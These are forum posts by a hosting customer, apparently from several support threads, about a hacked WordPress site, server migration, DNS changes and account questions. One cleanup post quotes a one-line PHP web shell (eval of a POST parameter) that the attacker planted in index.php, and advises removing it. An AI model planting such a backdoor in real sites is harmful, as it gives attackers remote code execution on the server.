danval

Maybe a 0-day attack? I update Wordpress to 4.9.7 on 5th July.

Thank you Wolstech. This is the most strange thing. I can tell you that my password was very strong (mixed letters an numbers, and not a common word). So a reverse hash could be imposible. It would be interesting to determine if those affected are only those who have a Wordpress installed. I notice the problem yesterday (Friday 20th at 14:53PM CEST) because Wordfence mailed me about an unexpected administrator login. Other account that was compromised was raqbul (belongs to a member of my family) at the same time.

Yes, this CMS is a headache. I had Wordpress up to date, and they still managed to attack it with success. If you don't have a backup, the best option is: Do a fresh install. Install the Wordfence plugin. It's free and can help you in this cases. Up to date regularly: plugins, themes and core. Do regularly backups.This is the best option to fight against attacks, although they will continue to happen. And some of them with success Anyway, this surely it is due to a hole in Wordpress, but how have they managed to change the cPanel password? This is the most frustrating thing I that I found so far...

In "index.php", remove this code at the start of file: <?php eval($_POST['475454656']); ?> The "php.ini" must be deleted because not belongs to Wordpress. I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one. Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole... .

Yes, the 'AnonymousFox' was the same administrator user rename as mine. I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made. I have done and scan from Wordfence, and I have the Wordpress installation modified: New file: wp-admin/2125719357.php New file: wp-content/1205929475.php New file: wp-admin/php.ini Modified file: index.php

Hi, The same thing was start happening to me yersteday. I have a Wordpress site on Tommy and I couldn't login either cPanel or Wordpress administration. After reset my password, I could login to cPanel. I checked Wordpress database and I discovered that the admin user login was renamed and password changed. These changes were not made from me, so I think the site was been hacked (and so my cPanel account). I though this was only my problem, but a family member who has a Wordpress blog on HelioHost too, suffered the same problem. The Wordpress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it. Seemingly the attack only affects to the passwords, not files and the database is in good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good. Anyone has the same problem? Best Regards,

Yes, I manage to restore the website and all it's working again. Many thanks for you support Krydos

I use EU.ORG, and in the past, I had problems setting nameservers in this domain provider. Because this I have an A record. As you say, I have changed the values of NS record to ns1.heliohost.org and ns2.heliohost.org, and delete A record. Time to wait for replication. Thank you again for your invaluable help.

Thank you Krydos! I have two questions: I've noticed that my forum username has changed to "danval2". Is it possible rename it to "danval"? In the DNS configuration for my domain, I have an A record pointing to 216.218.192.170. I think this IP was Stevie log time ago, although now it have another IP (65.19.143.2). Since this server is down, I changed the A record for my domain to point to Tommy (65.19.143.6). Is this correct?Best regards.

Hello, Because the current problems with Stevie, I must migrate my account to Tommy. I sent you a donation and received the invitation email to Tommy. But before I create an account in this server, an admin must delete my account on Stevie, right? This is my account info: Username: danvalDomain: cerberolabs.es.eu.orgServer: stevieTransaction ID: 0J528184E4869705KI'll transfer user, domain, email, database and files to this new account (I have a recent backup). On the other hand, at my home there is another person who also had a blog hosted on Stevie. This person don't have PayPal account. If I make another donation, could you send the invitation to Tommy to a different email than the transaction (I'll specify it in transaction message)? Thank you so much. Best regards.

Thank you Krydos. Everything is running ok now.

Hi, My database is also invisible on phpMyAdmin. User: danval Database: danval_wordpress Thanks,

Great! Thank you Byron

Hi, One person at my home would like to create a personal blog and I recommend this host server to her because I am very comfortable with the service. I have an account on HelioHost and I know about the account policy, but I don't know if accesing from same computer/network will be detected as violating terms of service with a duplicate account. Are there any problem with this situation? Can she create an account on HelioHost? I think I remember reading something long ago in the forum/faq/wiki about this situation, but I can't find it now.

I just check the site now, and it works (and FTP too). I don't know what was the cause of the issue, but it works fine now. You can mark this topic as solved or close it.